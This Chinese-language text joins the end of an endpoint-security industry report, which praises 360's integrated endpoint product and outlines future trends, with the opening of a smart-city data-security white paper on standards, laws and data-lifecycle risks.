等在内的多项终端安全能力。 虽然是以终端管理与防病毒为基础,但威胁对抗能力远不局限于特征匹配 这一传统模式。凭借多年积累的海量安全威胁数据,360 一体化端点安全凭借 优秀的数据支撑能力,如威胁情报、知识库、设备指纹库、终端行为数据等, 以知识图谱、机器学习等方式将前述单点安全能力进行数据层面的整合与拉通, 保证了其在威胁检测与响应方面的准确率与时效。 此外,在核心能力之外,与微软、Trellix 相比,360 一体化端点安全解 决方案最大的特点是符合国内用户的使用场景需求。 首先,应用场景覆盖勒索防护、APT 防护、挖矿防护、攻防演练、重大事 件保障、等保合规、数据安全等多个国内典型场景需求,例如,在操作易用性 方面,360 将实网攻防演练、重大事件保障等典型专项场景所需的功能菜单专 门做了场景化聚合,增加了必要的场景向导,缩短了操作链路,闭环了操作流程, 不仅降低用户操作流程易中断的问题,同时在专项场景的安全运营上给出有效 指导,使得针对上述各专项场景的安全运营门槛降低、效率提升。据 360 数字 安全提供的数据,其易用性测评专项场景及核心功能安全运营操作效率平均提 升 27.9%。 其次, 支持的端点类型除了主流的 Windows、Linux 与 macOS 之外, 还覆 盖统信 UOS、麒麟等信创终端操作系统并提供了与之匹配的信创专杀引擎。值 得一提的是,针对 Windows7 等老旧操作系统,360 的一体化端点安全产品还 提供漏洞补丁加固功能。此外, 在国家电网、运营商等典型客户的最佳实践中, 其端点安全解决方案还支持国内典型的隔离内网环境部署方式。如此一来,有 效补足了国外产品在上述方面的不足。 此外,在可视化方面,管理平台将隐蔽的、抽象的、复杂的、未关联的、 不直观的关键安全数据通过突出量化的方式直接传递给用户,让信息更高效传 达至安全运营人员。如实网攻防演练前的终端资产暴露面巡检环节,总览页面 会以分值形式直观显示“全网终端”体检的未通过率,以及存在各维度风险的 终端数量。 可以看出,作为入选本报告代表企业之一的 360 数字安全,其一体化端点 安全能力也更加符合本报告“关键能力”部分所提出的基于安全的终端管理、 防病毒、威胁检测与响应、多类型终端支持、操作易用性等方面的描述。 第五章 未来趋势 5.1 一体化端点安全落地难 一体化端点安全能力在当前来看,技术上的实现并不存在太多难点。但是 在落地实践过程中,却存在着用户和厂商之间博弈的矛盾。 对于用户而言,固然由同一个供应商提供的一体化端点安全能力能大大提 升端点侧安全运维效率及安全管理效果,但是却同样面临着将整个端点侧的安 全由单一供应商建立的风险。从商业角度来看,这无疑会削弱企业对自身安全 产品采购的管控力。因此,行业用户自身在一体化端点安全的落地上会存在一 定的犹豫。 5.2 泛终端安全一体化纳管 未来一段时间内,攻击暴露面的思路变化会促使一体化端点安全的端点覆 盖范围进一步向泛终端扩展。 从用户角度来说,端点设备一般按照功能或场景来分类使用,如 PC 个人 电脑、主机服务器、打印机等;但从攻击暴露面的角度来说,端点设备在攻击 者眼中只有脆弱性强弱之分,诸如摄像头、签到机这样的 IoT 设备,反而会成 为优先攻击的目标。因此泛终端安全基于攻击暴露面的统一纳管逐渐会成为安 全管理团队的共识。 5.3 有效助力信创安全风险管理水平 信创国产化替代很大程度上解决了“后门”的问题,但却带来了更多的潜 在的“漏洞”问题。目前信创操作系统及信创应用的升级、加固、漏洞补丁管 理从技术到生态都还不够成熟,安全风险有增无减。 因此,要想短时间内快速提升信创操作系统及信创应用的整体风险管理水 平,最具性价比的方式就是从一体化端点安全入手,通过一体化管理平台同时 从“终端管理”与“终端安全”两个主要维度降低信创国产化替代过程中伴随 的安全风险。
standards
一、 概述 (一)智慧城市发展现状 1. 智慧城市简介 智慧城市是全球城市发展的新理念和新模式 。根据国家标准 GB/T 37043-2018《智慧城市 术语》的定义,智慧城市是运用信息通信技术,有效 整合各类城市管理系统,实现城市各系统间信息资源共享和业务协同,推动 城市管理和服务智慧化,提升城市运行管理和公共服务水平,提高城市居民 幸福感和满意度,实现可持续发展的一种创新型城市。 智慧城市从提出至今,已经过 10 余年发展,其内涵也一直在不断发展和 深化。党的十八大以来,以习近平同志为核心的党中央提出“ 以人民为中心 的发展思想 ”,为推进新型智慧城市指明了发展方向。十八届三中全会提出 推动国家治理体系和治理能力现代化,十八届五中全会提出的“创新、协调、 绿色、开放、共享 ”发展理念,为城市发展赋予新的内涵和要求,全面推动 了传统意义上的智慧城市向具有中国特色的新型智慧城市发展。党的二十大 报告中再次强调“加强城市基础设施建设,打造宜居、韧性、智慧城市 ”。 当前,新型智慧城市已成为贯彻落实新发展理念、培育数字经济市场、建设 数字中国和智慧社会的综合载体。同时,新型智慧城市也是技术和产业发展 创新的综合试验场,发挥着重要的引擎作用。新型智慧城市建设已成为推动 我国经济改革、产业升级、提升城市综合竞争力的重要驱动力。 根据国内数字经济和智慧城市的建设现状,国务院依据《“十四五 ”规 划纲要》的精神,对“十四五 ”期间的数字经济和智慧城市发展进行了专项 规划,并于 2022 年印发了《“十四五 ”数字经济发展规划》,进一步在优化 升级数字基础设施、充分发挥数据要素作用、推进产业数字化转型、推动数 字产业化、持续提升公共服务数字化水平、健全完善数字经济治理体系、强 化数字经济安全体系等方面提出了建设和规划要求,为推动我国数字经济健 康发展和下一阶段的数字经济建设规划提供了顶层指导意见。 2. 智慧城市标准化建设现状 2013 年以来,我国智慧城市标准化工作得到了国家标准委、中央网信办、 发展改革委、工业和信息化部等部门的高度关注和支持,在标准化协调机制、 国家标准研制实施等方面取得了积极进展。 2015 年 10 月 23 日,国家标准委联合中央网信办及国家发展改革委印发 了《关于开展智慧城市标准体系和评价指标体系建设及应用实施的指导意见》 (国标委工二联〔2015〕64 号)。该文件从智慧城市标准体系、智慧城市评 价指标体系两个维度,明确了“十三五 ”期间我国智慧城市标准化工作的总 体目标和重点任务,是我国智慧城市标准化工作的第一份指导性文件; 同时 提出了我国智慧城市标准体系的总体框架(试行稿),即顶层设计的 1.0 版, 见图 1 。自此之后,我国智慧城市标准化工作有了明确和统一的顶层设计,所 有国家标准在该体系框架下进行规划、设计与实施。 图 1 国家智慧城市标准体系总体框架(2015 版试行稿) 在国家智慧城市标准体系指导下,截至目前国内相关标准化技术组织共 规划、立项了 69 项急用先行的国家标准。在各相关标准化技术组织的积极推 动下, 目前已有 39 项国家标准编制完成并发布(见附录二《已发布国家标准 清单》) 。GB/T33356-2016《新型智慧城市评价指标》、GB/T36333-2018《智 慧城市顶层设计指南》等国家标准已成为各地开展智慧城市规划、建设、评 估时重点参考的技术依据,得到了广泛应用,切实发挥了标准的规范和引领 作用。其中,GB/T 37971-2019 《信息安全技术 智慧城市安全体系框架》、 GB/Z 38649-2020 《信息安全技术 智慧城市建设信息安全保障指南》也提出 智慧城市安全体系的基本框架、组成要素和实施方法,为智慧城市安全工作 开展提供重要依据。 3. 各地智慧城市建设现状 (1)国内智慧城市建设现状 智慧城市从概念提出到落地实践,历经十多年建设与发展,我国智慧城 市建设数量持续增长。目前,所有副省级以上城市、89%地级以上城市、47% 县级,总计约 700 多个城市(含县级市)提出或在建智慧城市[1]。 从在建智慧城市的分布来看,我国已初步形成京津冀、长三角、粤港澳、 中西部四大智慧城市群。新型智慧城市建设呈现“ 区域特色明显 ”“地域差 异化显著 ”等发展态势,北京、上海、广州、深圳、杭州等城市发展水平相 对较高,为全国智慧城市建设提供了借鉴样本。根据 2017 年度、2019 年度两 次全国范围内的新型智慧城市评价工作,参评城市平均得分由 58.03 分上升至 68. 16 分,涨幅达 17.46%[2] ,惠民服务、精准治理、生态宜居、信息资源、改 革创新领域水平均有所提升。智慧城市作为一种新型城市发展形态和治理模 式已被社会群体广泛认可和接受,建设新型智慧城市渐成风潮、方兴未艾。 以 5G 、物联网、云计算、大数据、人工智能、区块链等为代表的信息技 术与新型基础设施建设全面融合,助推智慧城市高质量建设发展。截至 2022 年 2 月,我国已建成全球最大 5G 网络,累计已建成 5G 基站 150.6 万个[2] , 已有多个 5G 应用落地实践,涉及交通、教育、医疗、园区、社区、疫情防控 等场景。国家层面已经设立江苏无锡、浙江杭州、福建福州、重庆南岸区、 江西鹰潭等 5 个物联网特色的新型工业化产业示范区,物联网感知设施统筹 部署已经成为智慧城市建设的重要内容。上海、兰州、合肥、南京等多地建 立了云计算中心,并部署面向人工智能的计算加速资源和边缘计算布局,提 供先进的计算技术服务。2023 年 3 月, 中共中央、国务院印发了《党和国家 机构改革方案》,组建国家数据局。负责协调推进数据基础制度建设,统筹 数据资源整合共享和开发利用,统筹推进数字中国、数字经济、数字社会规 划和智慧城市建设等工作。 (2)国外智慧城市建设现状 IBM 于 2008 年提出“智慧地球 ”的概念后,新加坡、美国、欧盟、 日本 等国家和地区先后提出智慧城市发展战略,试图运用新一代信息技术来重新 审视城市的本质、城市发展目标的定位、城市功能的培育、城市结构的调整、 城市形象与特色等一系列现代城市发展中的关键问题。 新加坡被公认为全球领先的智慧城市, 由新加坡总理领导规划了新加坡 数字化发展愿景,并设立专门政府部门负责推进“智慧国家 ”建设以及协调 各机构工作。2006 年,新加坡推出为期十年的“智能城市 2015 ”信息化计划, 目的是通过大力发展 ICT 产业,应用 ICT ,提高关键领域的竞争力,将新加 坡建设成为由 ICT 驱动的智能城市。制定了智慧城市建设目标,定期发布报 告,让民众了解目标是否达成。经过十年的努力,效果显著,新加坡于 2014 年将该发展蓝图升级为“智慧国家 2025 ”,希望通过 ICT 改善人们的生活, 创造更多的机会。 美国网络安全和基础设施安全局 2020 年发布《智慧城市系统信任》 (Trustin Smart City Systems)报告。根据该报告,美国目前有数百个智慧城 市项目处于部署或开发阶段,这些项目的投资量和影响范围意味着美国公民 将更加依赖更智能的城市技术。美国政府尤为重视标准建设,如美国国土安 全部科学技术理事会推进发布《智慧城市互操作性参考体系架构》,以此来 评估智慧城市标准在公共安全领域的发展现状,并为物联网传感器提供可互 操作的开放架构。美国国家标准与技术研究所(NIST)推进发布《智慧城市 和社区框架系列》,以解决智慧城市建设中数据、网络、安全、特定行业及 实施方法等方面的问题。 欧盟是国际区域一体化的代表区域,近年来整个欧洲已启动了超过 15 项 针对数字化产业的国家计划,如德国工业 4.0 、法国未来工业联盟、荷兰智慧 产业等。2020 年,欧盟委员会先后发布了《塑造欧洲的数字未来》、《人工 智能白皮书》和《欧洲数据战略》3 份文件,从战略层面推进欧盟加快数字转 型,提升数字化水平。《塑造欧洲数字未来》涵盖了从网络安全到关键基础 设施、数字教育到技能、 民主到媒体的所有内容,该战略提出欧盟数字化变 革理念、战略和行动,希望建立以数字技术为动力的欧洲社会,使欧洲成为 数字化转型的全球领导者。 日本从自身自然资源贫乏和自然灾害频发的国情出发,制定了相应的计 划和政策来支持智慧城市的研究与建设。2009 年日本提出“i-Japan 战略2015 ”, 旨在将信息技术融入生产、生活的各个方面。2017 年, 日本内阁发布《成为 世界 IT 领先国家——促进公共和私营部门数据采用基本计划的声明》,其中 重点强调了促进建设以数据利用为导向的 ICT 智慧城市。东京于 2017 年发布 《都市营造的宏伟设计——东京 2040》城市总体规划,推进“新东京 ”实现 “安全城市 ”“ 多彩城市 ”“智慧城市 ”3 个愿景。《东京 2040》提出要利 用城市空间,结合不断发展的数据,搭建最尖端的信息平台,实现城市活动 便利性和安全性的本质提升,创新信息化城市空间。 综上所述,国内及世界各地智慧城市建设逐步通过区块链、物联网、人 工智能等新兴技术手段的应用,将城市中各行业数据相融合,实现城市管理 和公共服务的智能化、高效化和可持续发展。 (二)智慧城市系统架构及数据应用场景 1 .智慧城市系统架构 结合智慧城市发展现状,考虑当前智慧城市标准化需求,常见智慧城市 统一框架如图 2 所示。框架由总体标准、技术与平台、基础设施、数据层、 管理与服务、建设与运营、安全与保障七部分组成[2]。 图 2 常见智慧城市统一框架 总体标准层是智慧城市的顶层设计,从概念术语、架构模型、评价方法、 应用指南四个维度,规划智慧城市发展的方向。 技术与平台层汇聚智慧城市所需的核心计算技术,技术在智慧城市领域 的应用以及相关能力平台对业务的协同支撑作用、互联互通和互操作性,用 于保障上层智慧城市相关基础设施建设、数据、建设管理及智慧应用功能的 实现。 基础设施层是针对新型基础设施的技术、建设、管理的平台,切实为智 慧城市项目建设和运营基础服务提供支撑和保障。 数据层包括城市数据资源体系、城市数据模型、城市数据治理、城市数 据融合与服务四大项。数据层作为数据存储的体系架构,是数据安全防护的 重点。 管理与服务层,提供智慧城市相关领域规划、建设、实施与运营过程标 准,包括城市治理、惠民服务、生态宜居、产业发展、区域协同五大服务方 向。 建设与运营层,为智慧城市建设和运营过程提供技术、方法、流程、创 新等方面的指导和参考,包括规划设计、部署实施、运营管理、评估改进四 个子类。 智慧城市建设和运营过程中面临复杂的安全风险,安全防护是保障技术 与平台、关键基础设施、数据平台、管理与服务、建设与运营安全可靠的重 要基础。 2 .智慧城市数据应用 智慧城市场景众多,大致包括城市治理、惠民服务、生态宜居、产业发 展、区域协同等多个服务方向。基于数据的应用更是数不胜数,需关注从收 集、存储、使用加工、传输、提供、公开和销毁的各个数据处理周期过程。 要保障智慧城市多种应用场景的数据服务安全,需要充分考虑各阶段的数据 应用: 一是收集数据,其中涉及不同领域数据,如人口数据、地理数据、天气 数据、交通数据、医疗健康数据等。 同时数据收集方式多种多样,如传感器 采集、爬虫、录入、文件导入、接口、块数据等,且不同领域数据收集制式 不同,收集识别过程需要大量人工确认。数据收集过程中应在收集设备、收 集方式以及人工操作等环节保障安全。 二是存储数据,要保障城市海量数据存储安全,业务系统存储介质的安 全可信是非常必要的,同时也要考虑城市重要数据需要加密存储。 三是需要使用加工数据,智慧城市业务涉及数据类型多样,有文本、音 频、视频、图像等多形态数据,各个系统对数据做处理分析的同时也要保障 数据的安全性,如智慧安检中涉及大量人像、车辆、图像以及视频数据,想 要预测某一时间段违规车数量,则需要统一数据格式,同时也要对数据中用 户个人信息做一定的处理,防止数据的泄露。 四是传输数据,一方面数据收集及前期处理后,需传输到各个业务系统 内部再次进行存储或分析,如智慧消防应用需要传输用电数据、天气数据、 充电桩数据等数据帮助进行火灾的风险评估。另一方面各个业务系统、各组 件之间的数据实时传输,如智慧消防系统需要智慧交通系统的某一段的路况 数据。在系统和组件之间数据传输则需要安全的网络环境和传输设备,以确 保数据的机密性、完整性和可用性。 五是提供数据,要实现智慧城市信息系统的互联互通,各个业务系统之 间就要打破数据壁垒,实现数据为多种业务场景服务的能力,如用户用电数 据既可以服务智慧消防系统,也可以服务智慧城市运行,但要想实现数据的 互联互通,就需要有清晰的数据确权、规范安全的数据交换平台以及相应技 术支持(如隐私计算、数据沙箱等)。 六是数据公开,智慧城市信息不应只为各个业务系统提供数据支撑,还 需要服务公众,及时适度公开数据。对于法律法规要求公开的数据,使用数 据脱敏技术实施保护, 同时明确数据公开的范围、类别、条件、程序等,在 数据公开前分析研判可能对国家安全、公共利益产生的影响程度,存在重大 影响的不得公开。 七是数据销毁,智慧城市各服务节点分布式存储大量数据,当数据需要 销毁时,需要统一各平台对该条数据全部删除,防止数据残留。 (三)数据要素及其安全在智慧城市建设中的重要意义 1. 政策体系构建安全顶层设计 2021 年以来,我国陆续发布了《“十四五 ”国家信息化发展规划》、《“十 四五 ”数字经济发展规划》、《数字中国建设整体布局规划》等重要国家数 据战略,强调建设数字中国,加快数据要素市场化流通,创新数据要素开发 利用机制,保障智慧城市数据开发工作。伴随政务数据进程的发展,数据的 巨大价值和重要意义已得到强调和凸显。为规范数据处理活动,保障数据安 全,促进数据开发利用,我国在数据安全治理形成了以法律、行政法规、部 门规章及规范性文件、地方性法规、以及相关行业标准、指南等相结合的综 合性治理体系,不断加强数据治理的规范建设,整体的法律法规及规范脉络 关系如下表 1 所示: 表 1 我国数据安全综合治理体系 层级 规范名称 上位法 基本法律 基础性法律 《网络安全法》 《数据安全法》《个人信息保护法》 下位法 行政法规 《关键信息基础设施安全保护条例》 《网络数据安全管理条例(征求意见稿)》 部门规章及 规范性文件 《网络安全审查办法》《数据出境安全评估办法(征求意见稿)》《汽 车数据安全管理若干规定(试行)》 《工业和信息化领域数据安全管理办法(试行)(征求意见)》 《银行业金融机构数据治理指引》 《国家健康医疗大数据标准、安全和服务管理办法》 ...... 地方性法规 《深圳经济特区数据条例》《上海市数据条例》...... 标准、指南等 《信息安全技术个人信息安全规范》 (GB/T 35273-2020) 《网络安全标准实践指南—— 网络数据分类分级指引》...... 在法律层面,《中华人民共和国网络安全法》从法律层面保障了广大人 民群众在网络空间的利益,有效维护了国家网络空间主权和安全,是国家基 本法律;《中华人民共和国数据安全法》、《中华人民共和国个人信息保护 法》从法律层面提供了数据安全保障和个人信息保护,是相关领域的基础性 法律。《网络安全法》、《数据安全法》以及《个人信息保护法》共同构成 了我国数据保护的基础体系。《网络安全法》对数据安全和个人数据保护给 予了足够的关注,主要着眼于两方面:一是要求各类组织切实承担起保障数 据安全的责任,即保密性、完整性、可用性。二是保障个人对其个人信息的 安全可控。《数据安全法》发布,明确了数据、数据处理、数据安全的范畴, 理清了数据安全防护的主体责任,规范了国家机关、企业、个人在数据安全 防护的职责,为数据安全防护奠定了基础。《个人信息保护法》发布, 旨在 保护个人信息安全的法律,规定了个人信息的收集、使用、处理、存储、传 输等方面的要求和限制,加强了对个人信息的保护和管理。 在行政法规层面,《关键信息基础设施安全保护条例》规定了关键信息 基础设施的认定程序,进一步强调对公共服务、电子政务等重要行业数据安 全的保障,包括关键信息基础设施运营者应维护数据的完整性、保密性和可 用性;履行个人信息和数据安全保护责任,建立健全个人信息和数据安全保 护制度;发生重要数据泄露、较大规模个人信息泄露等情形时,保护工作部 门及时向国家网信部门、国务院公安部门报告的义务等。2021 年国家互联网 信息办公室代国务院颁布《网络数据安全管理条例(征求意见稿)》,规定 了数据安全的一般规则、个人信息保护、重要数据安全、数据跨境安全管理、 互联网平台运营者义务等的重要内容。条例是对数据安全相关法律的重要补 充,对智慧城市建设和政务数据利用有了更明确的要求。2022 年 12 月《中共 中央国务院关于构建数据基础制度更好发挥数据要素作用的意见》(以下简 称“数据二十条 ”)对外发布,强调数据基础制度建设事关国家发展和安全 大局,从数据产权、流通交易、收益分配、安全治理等方面构建数据基础制 度,提出 20 条政策举措。“数据二十条 ”的出台,将充分发挥中国海量数据 规模和丰富应用场景优势,激活数据要素潜能,做强做优做大数字经济,增 强经济发展新动能。 在行业部门规章层面,智慧城市数据来源于各行各业,我国的数据治理 也呈现出各部门协同治理的局面。为了应对各自领域的数据安全治理的风险, 网信部门、工信部门、公安部门以及金融、卫生等行业主管机构均在各自职 责范围内颁布数据安全治理的规范文件。例如,工业和信息化部、网信办等 十六部门发布《关于促进数据安全产业发展的指导意见》、国家互联网信息 办公室、工信部等五部门发布《汽车数据安全管理若干规定(试行)》、国 家互联网信息办公室、国家发改委等十三部门联合发布《网络安全审查办法》、 工信部发布《工业和信息化领域数据安全管理办法(试行)(征求意见稿)》、 中国银行保险监督管理委员会发布《银行业金融机构数据治理指引》、国家 卫生健康委员会发布的《国家健康医疗大数据标准、安全和服务管理办法(试 行)》等。 在地方性条例和管理办法层面,我国各地方同样在不断探索数据安全治 理的规则及模式,已出台的《上海市数据条例》、《重庆市数据条例》、《四 川省数据条例》、《深圳经济特区数据条例》、《浙江省公共数据条例》、 《江苏省公共数据管理办法》、《江西省公共数据管理办法》、《广东省公 共数据安全管理办法》、《山东省公共数据开放办法》、《河北省政务数据 共享应用管理办法》、《上海市公共数据开放实施细则(征求意见稿)》、 《福建省公共数据资源开放开发管理办法(试行)》等均在不断深化我国的 数据安全治理的模式,共计 30 余个省市相继提出了数据安全治理的新措施, 为当地智慧城市建设具有指导意义。 在国家行业标准层面,我国出台了一系列的国家标准、行业标准及相关 指南,对法律法规等规范性文件中的较为原则性的规定给予了具体的指导。 从防止数据泄露、保护个人权益、提升数据安全治理能力等多角度提出细化 的保护要求及保护措施,为我国智慧城市数据安全治理提供有力的支撑。 2. 数据安全保障数字经济发展 数据要素是数字经济的关键基础,数字经济是智慧城市发展的推动力。 数据要素快速融入生产、分配、流通、消费和社会服务管理等各个环节,基 于数据汇聚、数据分析的广泛应用,深刻影响智慧城市场景不断发展,如“一 网统管 ”、“一网通办 ”、“一网协同 ”等。智慧城市打造便民的生活和营 商环境,加快构建数据资源体系,对激发市场主体创新活力、助推数字经济 发展、加快数字中国建设步伐发挥至关重要作用。维护数据要素安全就是在 维护数字经济的安全。 维护数字经济安全就是维护国家安全。2020 年,我国数字经济核心产业 增加值占国内生产总值(GDP)比重达到 7.8%[3] ,数字经济为经济社会持续 健康发展提供了强大动力。到 2025 年,数字经济迈向全面扩展期,数字经济 核心产业增加值占 GDP 比重达到 10%[3] ,我国数字经济对国内核心经济影响 逐步提升,因此维护数字经济安全就是维护国家安全。 3. 数字技术安全要素融合创新 网络基础设施发展,智慧城市数据算力改变。根据十四五规划,我国将 建设高速泛在、天地一体、云网融合、智能敏捷、绿色低碳、安全可控的智 能化综合性网络基础设施。当前国家正在有序推进骨干网扩容,协同推进千 兆光纤网络和 5G 网络基础设施建设,推动 5G 商用部署和规模应用,前瞻布 局第六代移动通信(6G)网络技术储备,加大 6G 技术研发支持力度,参与 推动 6G 国际标准化工作。未来将大力发展空间信息基础设施演进,卫星通信 网络等,推动卫星互联网建设。物联网在工业制造、农业生产、公共服务、 应急管理等领域的覆盖水平有所提高。智慧城市数据的发展离不开基础网络, 在新型基础网络的扩建中,数据收集、传输、存储等安全方案也面临新的挑 战。 平台技术领域发展,智慧城市数据整合度提升。当前世界正在着力发展 传感器、量子信息、集成电路、关键软件、大数据、人工智能、区块链等战 略性前瞻性领域。智慧城市将逐步支持应用各类产学研协同创新平台,打通 贯穿基础研究、技术研发、 中试熟化与产业化全过程的创新链,重点应用云 计算、大数据、人工智能、区块链、新能源汽车等领域,突破智能制造、数 字孪生、城市大脑、边缘计算、脑机融合等集成技术。新型智慧城市建设依 赖于相关技术突破,数据的开发度也依赖技术底座。未来要推动城市技术与 数据整合共享和业务协同,提升城市综合管理服务能力,完善城市信息模型 平台和运行管理服务平台,因地制宜构建数字孪生城市。 数据要素多样性发展,智慧城市数据管理难度提升。智慧城市是一个以 数据为核心要素的智能系统。来自自然空间、物理空间、经济空间和社会空 间多元异构数据融合,构成了数据底座。智慧城市数据具有分布式、海量性、 多态性、关联性及语义性的新特点。随着城市的发展,数据类型呈现多样化 发展趋势,这包含结构化数据(如用户数据)、半结构化数据(文档报表、 统计报表数据)以及非结构化数据(图片数据、音视频数据);数据处理需 求的多样化,包括离线数据分析类应用和在线并发访问类应用。数据统一标 准、分类分级、数据全流程监控、跨行业监管等都是智慧城市数据安全面临 的新挑战。比如一个地级城市至少有 40 个委办局,再加上区级单位,会有 50 多个条线。北京在 2019 年实现一网统管时,汇集了 68 个不同系统[4] 。总的 来说,数据量的丰富和多样化对数据处理与安全技术提出了新的挑战,如数 据采集与存储、数据质量、数据处理与分析、数据安全与隐私等问题需要不 断进行技术突破和创新。 4. 数据安全社会需求与日俱增 数据要素是信息化社会的建设核心,对我们当今社会生活、工作和创新 发展都具有明显影响和重要意义。数据要素的发展使得商业更加智能和高效、 推动医疗保建的转型、改善教育质量、促进城市智慧化管理,帮助群众“最 多跑一次 ”、享受数据红利。然而数据带来便利的同时,数据安全事件也不 断发生。 数据安全事件影响程度日益加剧。数据安全威胁更加多样化,集中在数 据泄露、弱口令、特权账号访问、非法访问、越权访问等。数据安全事件影 响范围不断扩大。从受到影响的对象来看,数据安全事件的影响范围已经从 最初的企业或组织和个人,逐步延伸到国家各个行业、整个社会,甚至可能 会引发国际性的舆论关注。 从促进行业数字化转型和国家数字经济发展的角度看,数据安全问题会 从多方面产生显著的负面影响:首先,会抑制行业数据合理开放共享的意愿 和积极性;其次,会增加公众和运营企业对于个人信息和隐私数据的收集和 使用以及对于包括重要数据在内的数据交易、共享和价值挖掘活动的顾虑, 从而阻碍基于数据的新技术、新业务与实体经济的深度融合与创新;再者, 数据安全问题给数据的跨境流通增添了新的难度与挑战。 二、 智慧城市数据安全风险 (一)智慧城市数据安全内部管理风险 近年来,我国智慧城市建设持续深化,面临的数据安全问题日趋凸显, 而随着技术的进步,外部攻击变得越来越复杂,部分城市建设者将安全工作 完全集中在外部攻击上,这为内部风险留下了更多机会。一些建设者没有认 识到数据安全合规、数据处理周期或数据运营过程中安全的重要性。毫无疑 问,“ 内部威胁 ”是数据安全中最容易被忽视的方面之一。 1. 数据安全合规风险 近年来,我国数据安全法律法规、标准规范不断出台,智慧城市各业务 领域相关的地区性数据安全条例和规定也不断细化完善,对智慧城市数据安 全的监管力度也在不断增强。在此背景下,数据安全合规成为智慧城市数据 安全的首要任务。在实际落实过程中,需注意和解决如下问题: 一是缺少统一的合规治理标准:随着《网络安全法》、《个人信息保护 法》 、《数据安全法》 、《信息安全技术— 网络安全等级保护基本要求》 (GB/T22239-2019)等法律法规及国家标准的颁布,明确了智慧城市数据安 全领域的基本合规要求。在此前提下,各组织在智慧城市建设中均需落实法 律法规和标准规范在不同维度上的安全合规要求,但考虑到法律法规在要求 上比较笼统,与其配套的政策、制度和标准尚不健全,如缺少“智慧城市数 据安全 ”国家级规范标准,缺少对智慧城市数据分类分级、数据脱敏等基础 数据安全防护技术的标准要求和技术规范等,可操作性仍有待加强。同时, 业内缺少在智慧城市数据安全领域的优秀实践,与具体落地间存在差距。整 体来看,尚不健全的数据安全标准和实践指南难以为智慧城市数据合规提供 有效指引。 二是责任难以划分,智慧城市是多个信息系统与应用的集合。相应地, 在数据安全责任多方参与的背景下,监管方、使用方、保障方、建设方、运 营方等各种角色难以清晰地界定各自责任边界。同时,数据要素的流通也会 带来数据提供者、数据处理者、数据公开者等责任划分的困难。 2. 数据处理安全风险 根据《GB/T 42447-2023 信息安全技术 电信领域数据安全指南》 国家标 准,数据的处理措施包括七个阶段:数据收集、数据存储、数据使用加工、 数据传输、数据提供、数据公开、数据销毁。智慧城市数据在数据处理的不 同阶段面临不同程度安全风险。 (1)数据收集 从智慧城市建设与管理需求的角度,智慧城市数据收集包括基础数据(如 人口数据)、专题数据(如房屋数据)、业务专属数据(如公安、教育等领 域数据)、其他数据(如工业数据)等等。智慧城市数据收集类型多、收集 节点复杂、收集技术要求高的特点,导致智慧城市在数据收集阶段面临诸多 风险。数据收集阶段主要风险主要有,一数据收集范围不明确,未遵循最小 收集原则,导致数据过度收集、非法收集、非必要收集;二数据收集业务能 力有限,导致所收集数据的真实性和完整性难以保证;三数据收集面临劫持、 篡改控制命令,导致数据泄露。 (2)数据存储 数据是智慧城市的核心组成部分,智慧城市建设的效用高低,很大程度 上取决于大数据资产利用的深度与广度,而有效存储海量数据是智慧城市建 设中的一个关键问题。 目前,智慧城市数据存储阶段还面临着许多挑战,一 是数据存储介质不安全、不可信,易引发数据泄露或被窃取等风险;二是重 要或敏感数据缺乏梳理,对数据分布、脆弱性、访问接口不清楚,面对海量 数据,难以实行分类分级保护;三是数据使用、访问过程中,缺乏必要的数 据容错保护手段,易导致核心数据被破坏的风险,如新员工操作不熟练、运 维人员或特权人员为谋私利等破坏核心数据; 四是数据无定期备份,一旦遭 人为破获、软硬件故障、灾难灾害或突发事件等,易导致数据丢失;五是国 内智慧城市数据存储多依赖国外技术和软件,存在技术和软件不可控的风险; 六是敏感数据未加密存储,一旦被人窃取,将导致大量数据明文泄露风险。 (3)数据使用加工 智慧城市拥有海量数据,要真正实现“智慧 ”,城市需要拥有能够处理 分析和保护海量数据的能力。而智慧城市数据使用加工阶段也面临着大量安 全挑战,一是对数据的使用缺乏访问控制,易导致数据被窃取或破坏;二是 数据处理使用易发生数据库之间、应用与数据库之间数据异常流转、针对数 据库发动拖库或删库攻击的风险;三是数据防护手段不完善,内部员工非法 利用数据谋取自身利益。 (4)数据传输 智慧城市数据传输主要是指数据在各业务平台、各节点之间、各组件之 间以及跨组织之间进行传输,以实现万物互联。而城市信息化、智能化的推 进导致智慧城市数据在传输过程中可能会遭到不法分子的攻击,导致数据被 拦截、被篡改、被中间人攻击(MITM 攻击);也可能由于传输操作不当, 或因移动介质、传输设备和网络不安全等原因,导致数据泄露。 由于智慧城 市数据传输的异构、多源、关联等特点,即使多个数据集各自脱敏处理,在 传输过程中数据仍然存在因关联分析而造成信息泄漏的风险。 (5)数据提供 目前,建设智慧城市仍存在数据收集后缺乏整合、难以返还提供合理数 据的问题,给城市数字化建设带来难题。智慧城市数据提供阶段面临的主要 难题,一是数据交易平台不规范、不安全,防护能力不足,容易造成数据被 泄露、窃取、冒用;二是与外部单位进行数据提供过程中缺少技术审计手段, 一旦发生泄密难以溯源;三是数据接口缺少可信认证机制,存在非法应用服 务器接入的风险; 四是数据提供过程有隐私安全风险,通过数据推算数据所 有者信息造成隐私泄露。 (6)数据公开 数据公开是智慧城市的必要环节,但公开数据也会带来风险。数据公开 的风险一是范围过大导致非必要数据公开;二是类别选择不准确影响数据完 整性;三是公开条件不清晰导致数据未授权访问; 四是智慧城市数据公开程 序不合理导致数据管理难度增大,严重的将对国家安全和公共利益产生不良 影响。 (7)数据销毁 数据销毁阶段主要对数据及数据存储媒体通过相应的操作手段,使数据 彻底删除且无法通过任何手段恢复的过程。智慧城市建设包括智能电网、智 能交通、智能环保、智能城管等领域,而这些领域出于保密要求存在大量需 要进行销毁的数据,只有采取正确安全的销毁方式,才能达到保护关键数据 的目的。 目前,智慧城市数据销毁阶段面临的安全风险主要有:一是采用单 一销毁方式、数据销毁制度不完善,缺乏有效监督;二是数据销毁不彻底, 如普通的数据删除、低级格式化等不能彻底删除数据,容易造成数据泄露; 三是某些组织为了自身利益刻意恢复数据,转卖给第三方公司,严重侵害用 户隐私; 四是数据分布式存储技术的普及可能使数据销毁不彻底,或因数据 关联分析使得销毁数据恢复。 3. 数据运营风险分析 智慧城市建设过程中产生大量数据资产,而要最大化发挥数据资产的价 值,则重在数据运营,通过数据运营快速响应业务需求、驱动业务持续改进, 从而推动智慧城市高效协同发展。而我国智慧城市运营方式因地制宜,根据 各地市情况由城市管理局、大数据局、第三方开发公司等多方建设运营,同 时在建设过程中,仍有一些地方重建设轻运营,缺乏专业化数据安全运营管 